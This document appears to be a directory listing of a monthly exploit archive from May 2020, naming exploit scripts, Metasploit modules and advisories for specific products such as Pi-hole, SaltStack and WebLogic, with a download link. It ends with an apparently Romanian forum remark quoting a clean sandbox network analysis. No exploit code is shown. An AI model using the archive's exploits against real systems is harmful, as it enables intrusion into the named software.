GS20200512201532.tgz 05/15/2020 05:51 PM 1,584 GS20200515145103.txt 05/28/2020 07:23 PM 34,746 GS20200528162322.tgz 05/22/2020 02:59 AM 5,068 GymManagementSystem_v10_RCE.py.txt 05/17/2020 10:22 PM 1,325 hplinuxki601-exec.txt 05/04/2020 07:37 PM 6,001 hp_xglance_priv_esc.rb.txt 05/06/2020 12:10 AM 4,306 ibm_drm_a3user.rb.txt 05/06/2020 12:12 AM 12,056 ibm_drm_rce.rb.txt 05/07/2020 06:21 PM 1,044 ichat16-xss.txt 05/06/2020 05:33 PM 1,151 idoitoscmdb1141-filedelete.txt 05/02/2020 07:22 PM 604 joomlaadagency609-sql.txt 05/26/2020 05:45 PM 3,617 joomlaxclonerbackup353-disclose.txt 05/09/2020 09:22 PM 7,823 kartris16-upload.txt 05/06/2020 05:59 PM 3,259 kentico_staging_syncserver.rb.txt 05/14/2020 11:59 PM 9,952 KL-001-2020-002.txt 05/16/2020 09:55 PM 1,850 konicaminoltaftputility10-dos.txt 05/27/2020 08:02 PM 966 kuicmsphpee20-xss.txt 05/12/2020 11:13 PM 2,992 lansend32-overflow.txt 05/11/2020 06:35 PM 1,761 librenms146-sql.txt 05/27/2020 08:44 PM 1,899 limesurvey4111-xss.txt 05/12/2020 11:03 PM 3,703 makewhatis_exploit.py.txt 05/15/2020 05:49 PM 6,225 manageenginesd10-xss.txt 05/16/2020 09:32 PM 733 mikrotikrms123-sql.txt 05/06/2020 05:39 PM 2,069 mpcsharj3111-filedownload.txt 05/05/2020 11:58 PM 1,516 neceeiiiwebpro010301-enumerate.txt 05/14/2020 11:55 PM 1,539 netlink-exec.txt 05/12/2020 11:18 PM 5,799 netsweeper_webadmin_unixlogin.rb.txt 05/28/2020 07:08 PM 841 nokiavsspm2020-sql.txt 05/08/2020 11:05 PM 5,069 ntusermndragover.rb.txt 05/19/2020 05:41 PM 4,991 nukevietvms4400-xsrf.txt 05/11/2020 06:26 PM 1,925 oacfmsuname10-sql.txt 05/25/2020 10:02 PM 963 odfs10-exec.txt 05/18/2020 07:39 PM 1,591 ohms10-sql.txt 05/18/2020 07:38 PM 3,137 ohprms10-sql.txt 05/07/2020 06:15 PM 2,426 onlineagroculturefms10-sql.txt 05/18/2020 07:42 PM 2,326 onlinechattingsystem10-sql.txt 05/07/2020 06:26 PM 799 onlineclothingstore10-fileupload.txt 05/06/2020 05:52 PM 1,159 onlineclothingstore10-sql.txt 05/06/2020 05:53 PM 759 onlineclothingstore10-xss.txt 05/18/2020 07:37 PM 3,090 onlineexaminationsystem10-sql.txt 05/28/2020 07:18 PM 541 onlineexamsystem2015-sql.txt 05/27/2020 08:02 PM 4,297 onlinemrs10-xss.txt 05/21/2020 02:02 AM 1,426 openedxironwood25-exec.txt 05/26/2020 05:39 PM 5,058 openemr-exec.txt 05/05/2020 11:44 PM 2,807 oracledb11g-unquotedpath.txt 05/18/2020 07:49 PM 2,181 oraclehospitalityres370057-exec.txt 05/12/2020 10:58 PM 1,933 orchardcorerc1-xss.txt 05/05/2020 11:46 PM 1,116 oss10-sql.txt 05/03/2020 09:22 PM 1,497 osticket1141-xss.txt 05/28/2020 01:02 AM 9,058 osticket1141multi-xss.txt 05/04/2020 07:52 PM 1,565 outlineservice133-unquotedpath.txt 05/19/2020 11:29 PM 3,314 oxdovecot-nullpointerdos.txt 05/27/2020 05:44 PM 1,459 oxideshop634-sql.txt 05/29/2020 01:11 PM 2,012 panaceasoft-shell.txt 05/21/2020 02:01 AM 3,280 phpfusion903050persistent-xss.txt 05/19/2020 05:42 PM 1,563 phpfusion90350-sql.txt 05/05/2020 11:47 PM 1,721 phreebookserp525-exec.txt 05/10/2020 05:44 PM 3,435 pihole44-exec.txt 05/10/2020 09:22 PM 4,458 pihole44-execescalate.txt 05/27/2020 07:23 PM 10,192 pihole440-exec.txt 05/18/2020 07:50 PM 8,516 pihole_blocklist_exec.rb.txt 05/28/2020 07:27 PM 8,878 pihole_dhcp_mac_exec.rb.txt 05/26/2020 05:50 PM 4,737 pihole_whitelist_exec.rb.txt 05/06/2020 05:40 PM 3,490 pisay_v1_SQLi_AuthBypass_RCE.py.txt 05/22/2020 10:06 PM 7,059 plesk_mylittleadmin_viewstate.rb.txt 05/06/2020 12:03 AM 10,313 poc_atutor_2.2.4_iterate_hashbits.py.txt 05/12/2020 11:11 PM 2,608 qdpm91-upload.txt 05/19/2020 05:38 PM 2,857 qdpm91persist-xss.txt 05/28/2020 07:20 PM 3,962 qnapqtsphotostation603-exec.txt 05/22/2020 02:59 AM 21,589 QSA-qmail.txt 05/13/2020 05:01 PM 3,103 rda230157-overflow.txt 05/05/2020 11:59 PM 11,306 saltstack30001-exec.txt 05/12/2020 11:17 PM 9,223 saltstack_salt_unauth_rce.rb.txt 05/07/2020 06:16 PM 1,334 schoolfms10-sql.txt 05/05/2020 11:49 PM 2,085 simplephpgal07-rfi.txt 05/07/2020 06:17 PM 6,185 solarwindsmsp-permissionexec.txt 05/27/2020 07:21 PM 1,737 streamripper3226-overflow.txt 05/19/2020 05:39 PM 876 submitty200401-xss.txt 05/14/2020 11:49 PM 865 subrion421-xsrf.txt 05/14/2020 11:48 PM 2,074 subrion421encoding-xss.txt 05/22/2020 10:03 PM 7,476 synology_dsm_smart_exec_auth.rb.txt 05/19/2020 11:32 PM 6,383 SYSS-2019-039.txt 05/01/2020 09:32 PM 5,174 SYSS-2020-012.txt 05/02/2020 02:02 AM 4,300 tplinkncxx-hardcoded.txt 05/02/2020 01:22 AM 5,452 tplinkncxxbonjour-inject.txt 05/02/2020 02:55 AM 2,392 tplinkncxxsek-inject.txt 05/06/2020 12:07 AM 7,005 trixbox_ce_endpoint_devicemap_rce.rb.txt 05/12/2020 11:01 PM 2,420 tylertecheagle2018311-exec.txt 05/15/2020 05:48 PM 13,154 vbulletin561-sql.txt 05/04/2020 07:50 PM 5,520 veeam_one_agent_deserialization.rb.txt 05/19/2020 05:46 PM 2,247 victorcms10-shell.txt 05/11/2020 06:30 PM 2,574 victorcms10-sql.txt 05/19/2020 05:33 PM 2,021 victorcms10-xss.txt 05/25/2020 05:04 PM 2,178 victorcms10adduser-xss.txt 05/19/2020 05:34 PM 733 victorcms10catid-sql.txt 05/07/2020 06:34 PM 14,098 VL-2196.txt 05/04/2020 08:26 PM 6,043 VL-2219.txt 05/13/2020 05:29 PM 8,244 VL-2226.txt 05/07/2020 06:19 PM 7,854 VL-2229.txt 05/13/2020 05:28 PM 9,760 VL-2233.txt 05/07/2020 06:25 PM 10,678 VL-2234.txt 05/07/2020 06:23 PM 9,441 VL-2237.txt 05/04/2020 12:02 PM 10,131 VL-2243.txt 05/07/2020 06:32 PM 7,549 VL-2244.txt 05/08/2020 10:45 PM 4,887 VL-2247.txt 05/08/2020 10:53 PM 5,455 VL-2250.txt 05/08/2020 10:52 PM 5,540 VL-2251.txt 05/08/2020 10:44 PM 5,070 VL-2252.txt 05/22/2020 05:38 PM 3,450 vuplayer249m3udep-overflow.txt 05/06/2020 12:00 AM 992 weberp4151-disclose.txt 05/21/2020 07:42 PM 32,953 weblogic_deserialize_badattrval.rb.txt 05/06/2020 05:49 PM 2,635 webtareas20p8-filedelete.txt 05/08/2020 10:48 PM 1,362 webtareas20p8-xss.txt 05/18/2020 07:47 PM 4,332 wpajaxloadmore531-sql.txt 05/30/2020 08:32 PM 2,549 wpbbpress25-escalate.txt 05/08/2020 10:47 PM 1,634 wpchopslider3-sql.txt 05/12/2020 10:59 PM 1,417 wpchopslider34-sql.txt 05/27/2020 07:20 PM 5,850 wpdragdropucf1332-exec.txt 05/23/2020 10:22 PM 2,742 wpformmaker541-sql.txt 05/29/2020 06:45 PM 932 wpmultischeduler100-xsrf.txt 05/05/2020 11:51 PM 1,245 wpwoocommerce313-xss.txt 05/08/2020 10:40 PM 8,185 XL-2020-001.txt 05/08/2020 10:50 PM 7,941 XL-2020-002.txt 05/08/2020 10:56 PM 14,529 XL-2020-003.txt 05/16/2020 12:35 AM 5,075 XL-2020-004.txt 05/06/2020 05:44 PM 4,904 yeswikicercopitheque202004181-sql.txt 05/06/2020 05:54 PM 1,957 ZSL-2020-5566.txt 168 File(s) 18,260,736 bytes 2 Dir(s) 27,539,755,008 bytes free Download 202005-exploits.tgz (17 MB) Source

Nu duce nici unde Network Analysis DNS Requests No relevant DNS requests were made. Contacted Hosts No relevant hosts were contacted. HTTP Traffic No relevant HTTP requests were made Iti bati crerii aiurea, e la Discutii Incepatori, nu stie ce e VM, ar trebui mutat aici